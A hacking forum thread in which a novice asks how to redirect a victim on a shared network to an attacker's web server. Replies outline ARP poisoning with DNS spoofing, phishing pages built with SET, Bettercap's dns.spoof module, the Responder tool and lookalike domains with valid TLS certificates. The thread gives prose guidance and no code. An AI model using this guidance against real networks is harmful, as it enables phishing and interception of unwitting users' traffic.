[QUESTION] How would you go about forcing a user on a network on a web page?
#1
Hello! I've taken up hacking and of course I have many burning questions that I haven't figured out how to answer on my own.
I've learned about ARP Spoofing/Poisoning where an attacker can proxy traffic from a victim through their machine.
I'm curious if you could do some form of ARP poisoning that either changes the DNS out come of a website to an attacker machine's port and how one could manage that.

If my question wasn't clear, here's a scenario below:
Bob is a hacker that wants to force Alice, a casual user of a shared network, onto his website. Bob has a web server running on his machine and wants Alice to visit the page. How would Bob redirect Alice to his web server instead of the web server Alice wants to visit? (I'm assuming this has to be done with some form of ARP spoofing and modifying DNS)

Thanks for all the help!
Reply
#2
(01-19-2021, 10:57 PM)ueax Wrote: I'm curious if you could do some form of ARP poisoning that either changes the DNS out come of a website to an attacker machine's port and how one could manage that.

This is possible, it's called DNS Poisoning. I don't have everything in my head right now but it works pretty similar to ARP poisoning. You set up your own records (eg facebook.com and point it to an IP of your own, a good idea would be to locally host a phising page made by SET - Social Engineering Toolkit; And redirect domain requests to your local webserver with phising page). Although much more can be done.

Found a pretty good article that explains some of it: https://www.tutorialspoint.com/ethical_h...soning.htm

(01-19-2021, 10:57 PM)ueax Wrote: If my question wasn't clear, here's a scenario below:

Bob is a hacker that wants to force Alice, a casual user of a shared network, onto his website. Bob has a web server running on his machine and wants Alice to visit the page. How would Bob redirect Alice to his web server instead of the web server Alice wants to visit? (I'm assuming this has to be done with some form of ARP spoofing and modifying DNS)



Thanks for all the help!

Besides the point I made above: To catch the DNS requests to your local fake DNS server, and return your own IPs/destinations. If you want to force a user onto a web page, no matter what that should be possible too. If you've ever connected to public wifi, many of them have gateway pages where you have to accept terms; create accounts etc. And you will be automatically redirected to it if you havent gone through it yet.

For that you would probably need access to the router, and enable forced auth to a gateway or similar. Like: https://serverfault.com/questions/276014...b-site-hos
Reply
#3
Thanks a lot! I'll check those all out.
Reply
#4
is it a windows user ? What would happen if you tossed a .html file in his startup dir ?
Reply
#5
Interesting coincidence. I am currently designing (and then will code) an application that will do exactly this. It uses ARP poisoning to send all traffic for the target through the attacker machine. It will then sniff all the data for DNS queries, and if it detects one, it will respond back to the requestor with a response of the attackers choosing.
Reply
#6
Since a lot of technical information already has been provided i'd figure i'd point out that a tool by the name of Responder might be the kind of thing you are looking for OP.

The repo says deprecated, but most pentesting distros still support Python2 implementations. so if you want to check it out you can find it by clicking here

Also, it should be pretty straightforward to set up a Dockerfile to deploy Responder. That way, you don't have to worry about dependency issues either.
Reply
#7
Some great replies already in this thread! There's also a good number of tools out there that can do what you want (get your target to use your poisoned DNS server). Bettercap is my personal fav - you can use the `dns.spoof` module to achieve your goal: https://www.bettercap.org/modules/ethern...dns.spoof/

One thing to keep in mind is that you _won't_ be able to spoof the https certs. This would require you to either have access to their machine, or trick them to installing your CA as a trusted CA on their box.

An alternative is to register lookalike domains and get valid TLS certs for those domains, and have your target be redirected to those domains. This way, they'll still get all the HTTPS goodness they expect, the domain looks kinda sorta like the domain they're expecting to see (or maybe they don't see the full domain at all? Thanks, Chrome!), and you get to see what they're up to. Everybody wins
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  how do I get a key log file to decrypt traffic on my home network? QMark 1 4,080 05-07-2021, 05:41 AM
Last Post: poppopret
  What other ways are there to capture passwords on an open network besides sniffers? QMark 5 13,941 06-28-2018, 08:22 PM
Last Post: enmafia2
  Is CCENT enough to build a professional network? QMark 5 14,089 03-25-2018, 07:46 PM
Last Post: EnigmaCookie
  The Complete Wireshark Course: Beginner to Network Admin! Cypher 2 11,284 03-06-2018, 03:15 AM
Last Post: QMark